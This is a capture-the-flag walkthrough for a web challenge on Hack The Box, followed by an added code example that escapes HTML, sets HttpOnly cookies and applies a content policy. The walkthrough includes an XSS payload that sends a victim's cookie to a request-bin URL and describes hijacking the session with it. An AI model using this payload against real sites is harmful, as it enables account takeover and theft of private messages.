This walkthrough is a step-by-step guide to solving the OnlyHack challenge on Hack The Box.
Challenge Information
Description: Dating and matching can be exciting especially during Valentine's, but it’s important to stay vigilant for impostors. Can you help identify possible frauds?
Difficulty: 🟢 Very Easy
Platform: Hack The Box
Category: Web
Points: 0 (Retired)
Link: https://app.hackthebox.com/challenges/onlyhack
Complete the Challenge
First, we open the target IP in our browser, where we will see this:
Since we don't have an account, we need to click on Sign Up Now and fill in all the required fields:
After registering, you will see cards of people, like on “Tinder”, and we need to accept Renata.
She will message us asking how it is going.
Let's try to send her a simple HTML payload with an <h1> tag and see how the chat behaves.
We notice that the chat renders the HTML, so let's try sending a simple XSS payload to steal her cookie. Since the challenge operates over the Internet, the easiest way to capture the request is to create a Request Bin and use the bin's address in our payload.
<script>document.location='{URL_REQUEST_BIN}?c='+document.cookie</script>
After sending the payload, we refresh our bin and notice two requests. One of them comes from our own browser rendering the XSS, so we inspect the requests and grab the cookie from the one that does not match ours.
Now we only need to replace our cookie with Renata's cookie, and then we can see all her DMs.
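The two weaknesses this walkthrough relies on (the chat inserting message text into the page as HTML, and the session cookie being readable through document.cookie) are shown below next to their fixes. This is an added example, not the challenge's own code: the function names, the cookie name and the cookie value are hypothetical, and the sample input is the payload from above with its placeholder left in.

```javascript
// Added example: names (renderMessageUnsafe, renderMessageSafe, sessionCookie)
// are hypothetical; the challenge's real server code is not shown on this page.

// Characters that can change how the browser parses HTML.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Weak: message text is concatenated into markup, so any tags in it are parsed.
function renderMessageUnsafe(sender, text) {
  return `<div class="msg"><b>${sender}</b>: ${text}</div>`;
}

// Hardened: both fields are encoded for the HTML body context before insertion.
function renderMessageSafe(sender, text) {
  return `<div class="msg"><b>${escapeHtml(sender)}</b>: ${escapeHtml(text)}</div>`;
}

// Set-Cookie value with HttpOnly, so script running in the page cannot read
// the session through document.cookie even if an injection slips through.
function sessionCookie(name, value) {
  return `${encodeURIComponent(name)}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Second layer: a Content-Security-Policy that refuses inline <script> blocks.
const CSP_HEADER = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

// Constructed sample input: the walkthrough's payload, placeholder unchanged.
const SAMPLE = "<script>document.location='{URL_REQUEST_BIN}?c='+document.cookie</script>";

function demo() {
  return {
    unsafe: renderMessageUnsafe('new_match', SAMPLE), // script tag survives
    safe: renderMessageSafe('new_match', SAMPLE),     // script tag shown as text
    cookie: sessionCookie('session', 'constructed-value'),
    csp: CSP_HEADER,
  };
}

console.log(demo());
```

With the hardened renderer the payload is displayed in the chat as literal text, and with HttpOnly set the cookie would not have appeared in the request bin in the first place.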